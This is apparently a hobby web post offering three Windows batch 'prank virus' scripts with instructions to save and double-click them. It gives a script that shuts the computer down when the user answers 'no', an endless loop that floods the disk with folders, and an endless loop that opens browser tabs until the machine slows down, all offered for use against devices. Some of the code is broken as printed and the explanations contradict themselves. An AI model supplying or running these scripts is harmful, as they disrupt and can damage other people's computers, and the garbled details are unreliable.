Funny virus scripts but kills computers

 Funny Virus Scripts



Disclaimer: the scripts provided can harm devices so careful while using the code.

"we are not responsible for your loss"

Note: use notepad for typing script's

1. Script name: love virus

code:

-------------------------------------------------------------------------

@echo off color 60 echo Hey, hi do you love me (answer in yes or no) set /p love= if %love%==yes goto love if %love%==no goto hate :love echo I love you too baby... echo Meet you soon :) miss you. pause exit :hate echo But I love you....hahaha echo You are hacked... echo Your PC will crash in 5 seconds timeout 5 shutdown -s -t 50

-------------------------------------------------------------------------

save this file as love.bat ( .bat is windows batch file extension)

double click on this script to execute the file...

Explanation: this code is harmless and will shutdown pc if they give NO as response.


2. Script name: folder multiplier

code: 

-------------------------------------------------------------------------

@echo off

:flooder

        md %random%

goto flooder

-------------------------------------------------------------------------

save file as flooder.bat ( .bat is windows batch file extension)

double click on this script to execute the file...

Explanation: its an harmful script because it slows down your pc by creating random files.


3. Script name: browser crasher

code:

-------------------------------------------------------------------------

@echo off

:A

start www.google.com

start www.youtube.com

start www.hotmail.com

start www.facebook.com

start www.google.com

start www.youtube.com

start www.hotmail.com

start www.facebook.com

ping localhost -m 2 >nul

goto :A

-------------------------------------------------------------------------

save file as coder.bat ( .bat is windows batch file extension)

double click on this script to execute the file...

Explanation: its an harmful script because this script will open browser utilize memory to open multiple tabs

and can harm device to slowdown.